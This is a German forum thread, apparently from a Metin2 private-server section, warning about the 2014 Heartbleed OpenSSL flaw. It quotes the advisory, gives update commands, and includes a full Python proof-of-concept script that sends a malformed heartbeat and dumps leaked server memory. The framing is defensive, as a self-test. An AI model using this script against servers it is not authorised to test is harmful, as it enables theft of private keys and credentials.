|
You last visited: Today at 02:32
Advertisement
[Warnung]OpenSSL Sicherheitslücke
Discussion on [Warnung]OpenSSL Sicherheitslücke within the Metin2 PServer Guides & Strategies forum part of the Metin2 Private Server category.
04/11/2014, 21:26
|
#1
|
elite*gold: 25 
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
|
[Warnung]OpenSSL Sicherheitslücke
Ein kritischer Fehler in der Verschlüsselungssoftware OpenSSL wurde am späten Montag Abend von seinen Entdeckern öffentlich gemacht. Die Schwachstelle welche sich selber “Heartbleed” nennt, ermöglicht Angreifern, geschützte Informationen auszulesen und die Kommunikation abzugreifen. Hier kann der Server dazu gebracht werden, den privaten Schlüssel des Servers preiszugeben [ Der private Schlüssel (Private Key) liegt auf dem Server, auf welchem Dienste, welche SSL beanspruchen, genutzt werden. Nur mit dem privaten Schlüssel ist der Server in der Lage die Daten zu entschlüsseln. ]
Einer aktuellen Server Studie nach, nutzen knapp zwei-drittel aller Webserver, Software welche OpenSSL enthält, das Problem ist hier also global. Alle Versionen von 1.0.1 bis 1.0.1f eingeschlossen sind betroffen. Eine korrigierte Version 1.0.1g wurde heute veröffentlicht. Eine Warnung vom OpenSSL-Team wurde veröffentlicht :
OpenSSL Security Advisory [07 Apr 2014] ======================================== TLS heartbeat read overrun (CVE-2014-0160) ========================================== A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <  > and Bodo Moeller < > for preparing the fix. Affected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS. 1.0.2 will be fixed in 1.0.2-beta2.
Glück gehabt haben Anwender älterer Distributionen, die noch auf OpenSSL 1.0.0 oder eine der 0.9-Versionen setzen, diese sind von dem Problem nicht betroffen.
Um zu testen ob Ihre Webseite betroffen ist, besuchen Sie bitte filippo.io
Sollten Sie hier nicht diese Meldung erhalten, müssen Sie OpenSSL aktualisieren :
Linux / Ubuntu / Debian / Fedora ...
wget
tar xfz openssl-1.0.1g.tar.gz
cd openssl-1.0.1g
./config –prefix=/usr zlib-dynamic –openssldir=/etc/ssl shared
make
sudo make install
pkg update openssl
freebsd 9 or older:
portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean
hier noch ein python script zum testen:
Code:
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ()
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
|
|
|
|
04/11/2014, 21:35
|
#2
|
elite*gold: 11
Join Date: Nov 2010
Posts: 1,709
Received Thanks: 3,828
|
Those instructions are for Linux.
in freebsd 10:
pkg update openssl
freebsd 9 or older:
portsnap fetch extract
cd /usr/ports/security/openssl
make reinstall clean
|
|
|
|
|
04/11/2014, 21:36
|
#3
|
elite*gold: 20
Join Date: Aug 2012
Posts: 714
Received Thanks: 1,168
|
99% werden hier von nicht betroffen sein.
Erst sich selbst informieren und dann kopieren 
FreeBSD bis 9.2 nutzt noch OpenSSL 0.9.8 die nicht durch den Fehler betroffen sind. Ausserdem nutzt eigentlich kein Server SSL, und SSH nutzt sein eigenes.
Gruss,
Chuck
|
|
|
|
|
04/11/2014, 21:50
|
#4
|
elite*gold: 0
Join Date: May 2013
Posts: 1,266
Received Thanks: 627
|
Ist das nicht schon seit cirka ner woche bekannt ..?
trotzdem danke
|
|
|
|
|
04/11/2014, 22:02
|
#5
|
elite*gold: 169
Join Date: Dec 2012
Posts: 2,577
Received Thanks: 369
|
was macht das in der metin2 sec? denke nicht das hier wer legale ssl zertifikate hat ...
und ssl benutzen denke ich mal eh die wenigsten aber naja
|
|
|
|
|
04/11/2014, 22:30
|
#6
|
elite*gold: 0
Join Date: Feb 2008
Posts: 2,754
Received Thanks: 1,748
|
Würde mich mal interessieren, woher du das wieder abkopiert hast.
Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.
Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.
@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die Problematik dahinter ganz offensichtlich noch nicht verstanden.
/e: Lass es doch bitte einfach bleiben.
|
|
|
|
|
04/11/2014, 22:44
|
#7
|
elite*gold: 169
Join Date: Dec 2012
Posts: 2,577
Received Thanks: 369
|
Quote:
Originally Posted by Computerfreek
Würde mich mal interessieren, woher du das wieder abkopiert hast.
Betrifft Metin2 in keinem Fall. In den Serverfiles wird 0.9.8k benutzt, FreeBSD benutzt standardmäßig auch Versionen <1.0.1.
Außerdem sollte sowieso jeder sein System regelmäßig aktualisieren - und damit ist das Problem (zumindest nach dem Neustart) auch behoben.
@.Meep:
Ist doch vollkommen egal, ob jemand "legale" Zertifikate benutzt oder nicht. Du hast die ganze Problematik dahinter ganz offensichtlich noch nicht verstanden.
|
was das problem ist schon was es auslöst nicht juckt mich aber auch nicht tls ftw?^^ naja stimmt man brauch kein legales zertifikat und es geht auch nicht um die benutzer sondern die serverzugänge also mitm ftp client oder so?!
|
|
|
|
|
04/12/2014, 00:03
|
#8
|
elite*gold: 50
Join Date: Nov 2009
Posts: 865
Received Thanks: 1,229
|
Quote:
|
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
|
SyntaxError: invalid syntax
|
|
|
|
|
04/12/2014, 00:09
|
#9
|
elite*gold: 25
Join Date: Feb 2014
Posts: 110
Received Thanks: 62
|
example : python ssltest.py -p 80
|
|
|
|
|
04/12/2014, 00:40
|
#10
|
elite*gold: 405
Join Date: Dec 2007
Posts: 6,615
Received Thanks: 6,356
|
Quote:
Originally Posted by .Meep
legales zertifikat
|
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
|
|
|
|
|
04/12/2014, 02:49
|
#11
|
elite*gold: 0
Join Date: Jan 2014
Posts: 42
Received Thanks: 18
|
hier könnt ihr es testen ob ihr die Lücke habt...
|
|
|
|
|
04/12/2014, 11:02
|
#12
|
elite*gold: 169
Join Date: Dec 2012
Posts: 2,577
Received Thanks: 369
|
Quote:
Originally Posted by Mi4uric3
Steht das "Open" in "OpenSSL" nicht für "OpenSource"? Wofür braucht man da ne Lizens?
|
Damit oben im browser steht das die n zertifikat haben 
|
|
|
|
|
04/12/2014, 12:01
|
#13
|
elite*gold: 220
Join Date: Oct 2011
Posts: 7,369
Received Thanks: 7,610
|
Ob es fürs Kopieren auch so eine gute Anleitung dazu gab? Alle regen sich über so eine Lücke auf, nur weil Medien im Moment keine anderen Themen finden oder in Afrika einfach zu wenig los ist.
|
|
|
|
|
04/12/2014, 12:03
|
#14
|
elite*gold: 0
Join Date: Apr 2012
Posts: 1,438
Received Thanks: 632
|
Sorry, aber was hat das mit Metin2 zu tun?
Nur weil hier viele Webseitenbetreiber sind? - Demnach poste es doch auch in den unzähligen Sektionen, wo sich auch Webseitenbetreiber aufhalten.
Regards
|
|
|
|
|
04/12/2014, 12:16
|
#15
|
elite*gold: 0
Join Date: Apr 2014
Posts: 37
Received Thanks: 58
|
Die lücke ist mir zumindest schon 2 Jahre bekannt also nichts neues. Gibt mehr als nur die eine.
|
|
|
|
 |
|
Similar Threads
|
OpenSSL
04/03/2014 - Technical Support - 7 Replies
Hey,
Ich brauche diese OpenSSL Version für Windows: 1.0.1.E
Wo krieg ich die her?
Find die leider nicht :(
Gibt es nur für Linux, die kann ich ja nicht nehmen für Windows?!
|
Problem with OpenSSL
10/31/2012 - CO2 Private Server - 2 Replies
Hello mates, I'm currently having trouble with running Arco Online's source, I wanted to go through it and check it out but sadly there's something wrong, This is the only source that refuses to run, I've attached the error I'm having at the bottom, I'm currently running on a x64 bit operating system, But I forced the project to run in 32x mode, And replaced the libeay32.dll, I also got everything configured correctly, I wish there's anyone that could atleast guide me to fix it as I've been...
|
Openssl
08/29/2012 - C/C++ - 5 Replies
Ich versuche gerade mithilfe von OpenSSL RSA in C++ zu benutzen.
Ich habe es von der Homepage runtergeladen und mein Problem ist jetzt, dass ich dort nur Headerdatein, aber keine dazugehörigen cpp Dateien finde
Ich hoffe ihr könnt mir helfen
|
[SICHERHEITSLÜCKE]SSH/Metin2 Sicherheitslücke
08/18/2011 - Metin2 PServer Guides & Strategies - 26 Replies
Hey,
ich will hier mal eine Sicherheitslücke in SSH die man über Metin2 erreicht releasen.
Aber damit das nicht geleecht wird, habe ich es encrypted. Schreibt mich an, dann sag ich euch wie ihr es entschlüsselt!
...
|
All times are GMT +2. The time now is 02:32.
|
|
![[Warnung]OpenSSL Sicherheitslücke](https://www.elitepvpers.com/forum/iconimages/metin2-pserver-guides-strategies/warnung-openssl-sicherheitsl-cke_ltr.gif){kind=small}
![[uLow]NTX?!'s Avatar](https://www.elitepvpers.com/forum/customavatars/avatar5260732_1.gif){kind=avatar}
